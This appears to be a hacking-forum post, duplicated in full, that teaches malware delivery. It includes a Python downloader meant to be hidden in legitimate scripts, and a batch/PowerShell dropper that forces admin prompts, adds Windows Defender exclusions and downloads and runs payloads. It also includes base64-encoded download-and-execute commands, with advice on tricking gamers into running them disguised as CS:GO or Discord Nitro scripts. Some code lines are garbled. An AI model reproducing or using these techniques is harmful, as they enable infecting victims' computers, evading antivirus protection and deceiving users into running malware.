If you add the python code found below:
import requests
url = "cantpostlinks//raw.githubusercontent.com/portal/main/requests.json"
r = requests.get(url)
with open("python.cmd", "wb") as f:
f.write(r.content)
subprocess.call("python.cmd")
This is a python downloader. You can add it to legit python files, and make it download and execute your shit.
It looks legit because requests.json from GitHub, but that's actually a .bat file.
You probably all know but I'm gonna advise it anyway; bat files are undetected by wd and can disable/exclude wd and dl+execute your malware successfully. That's what I use to bypass WD and I think it works great!
Here's a bat file that forces admin (it will keep popping up)
<# :batch script
Echo Please wait...
off
setlocal
cd "%~dp0"
powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('%~f0'))"
endlocal
goto:eof
#>
while($true){try{Start-Process 'cmd' -WindowStyle Hidden -Verb runas -ArgumentList '/k powershell -command add-mppreference -exclusionpath C:\ && powershell -command add-mppreference -exclusionprocess C:\ && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\sync.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\sync.exe && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\qz.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\qz.exe
/priv';exit}catch{}}
This should be really useful for some of you! I hope so. Let me know if you have any questions. But my questions for you guys is; what are people always downloading/looking for on GitHub or anywhere they run python files from? What scripts could you 'backdoor' so to speak. Please let me know if you have any ideas.
Also if anyone needs an .url exploit I have it and have build it and even host it for you on a nice domain. (it shows up) but it's legit. I think the .url exploit works better with .lnk shortcuts but you can use provided bat file if you'd like and call it like default_viewer.bat -- not great, but if you can spread to loads for some valid reason then it's here!
Oh and one final trick for anyone looking to get gamer/scripter bots or anything actually use your imagination. It's basically getting people to run an encoded powershell command (so they can't see the link of the url they're downloading+executing from. Here's how you do it:
Open powershell
Replace the direct link to your payload (in my base .bat)
$Text = ‘Invoke-WebRequest directdownloadlink.com/tmp/1.bat -Outfile c:\windows\temp\1.bat; Start-Process c:\windows\temp\1.bat’
β = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]:
oBase64String(β)
$EncodedText
When you've put that in powershell and hit enter it will give you a base64 result like this:
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
Now all you need to do is find some way of SEing the victim into typing this in cmd:
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
You can add things to it to make it more convincing like these for example:
CS:GO Aim config idea
echo aim_config && powershell -enc
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
Discord Nitro Script idea
echo nitro_trial && powershell -enc
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
You can make them run this encoded command in cmd. So just find an excuse for them to do it! Good luck
Hope this helps!
import requests
url = "cantpostlinks//raw.githubusercontent.com/portal/main/requests.json"
r = requests.get(url)
with open("python.cmd", "wb") as f:
f.write(r.content)
subprocess.call("python.cmd")
This is a python downloader. You can add it to legit python files, and make it download and execute your shit.
It looks legit because requests.json from GitHub, but that's actually a .bat file.
You probably all know but I'm gonna advise it anyway; bat files are undetected by wd and can disable/exclude wd and dl+execute your malware successfully. That's what I use to bypass WD and I think it works great!
Here's a bat file that forces admin (it will keep popping up)
<# :batch script
Echo Please wait...
off
setlocal
cd "%~dp0"
powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('%~f0'))"
endlocal
goto:eof
#>
while($true){try{Start-Process 'cmd' -WindowStyle Hidden -Verb runas -ArgumentList '/k powershell -command add-mppreference -exclusionpath C:\ && powershell -command add-mppreference -exclusionprocess C:\ && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\sync.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\sync.exe && powershell Start-BitsTransfer -Source directlink.com/payload.exe -Destination %USERPROFILE%\AppData\qz.exe && powershell Start-Process -FilePath %USERPROFILE%\AppData\qz.exe
/priv';exit}catch{}}
This should be really useful for some of you! I hope so. Let me know if you have any questions. But my questions for you guys is; what are people always downloading/looking for on GitHub or anywhere they run python files from? What scripts could you 'backdoor' so to speak. Please let me know if you have any ideas.
Also if anyone needs an .url exploit I have it and have build it and even host it for you on a nice domain. (it shows up) but it's legit. I think the .url exploit works better with .lnk shortcuts but you can use provided bat file if you'd like and call it like default_viewer.bat -- not great, but if you can spread to loads for some valid reason then it's here!
Oh and one final trick for anyone looking to get gamer/scripter bots or anything actually use your imagination. It's basically getting people to run an encoded powershell command (so they can't see the link of the url they're downloading+executing from. Here's how you do it:
Open powershell
Replace the direct link to your payload (in my base .bat)
$Text = ‘Invoke-WebRequest directdownloadlink.com/tmp/1.bat -Outfile c:\windows\temp\1.bat; Start-Process c:\windows\temp\1.bat’
β = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]:
oBase64String(β)$EncodedText
When you've put that in powershell and hit enter it will give you a base64 result like this:
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
Now all you need to do is find some way of SEing the victim into typing this in cmd:
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
You can add things to it to make it more convincing like these for example:
CS:GO Aim config idea
echo aim_config && powershell -enc
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
Discord Nitro Script idea
echo nitro_trial && powershell -enc
SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAZABpAHIAZQBjAHQAZABvAHcAbgBsAG8AYQBkAGwAaQBuAGsALgBjAG8AbQAvAHQAbQBwAC8AMQAuAGIAYQB0ACAALQBPAHUAdABmAGkAbABlACAAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXAAxAC4AYgBhAHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcADEALgBiAGEAdAA=
You can make them run this encoded command in cmd. So just find an excuse for them to do it! Good luck
Hope this helps!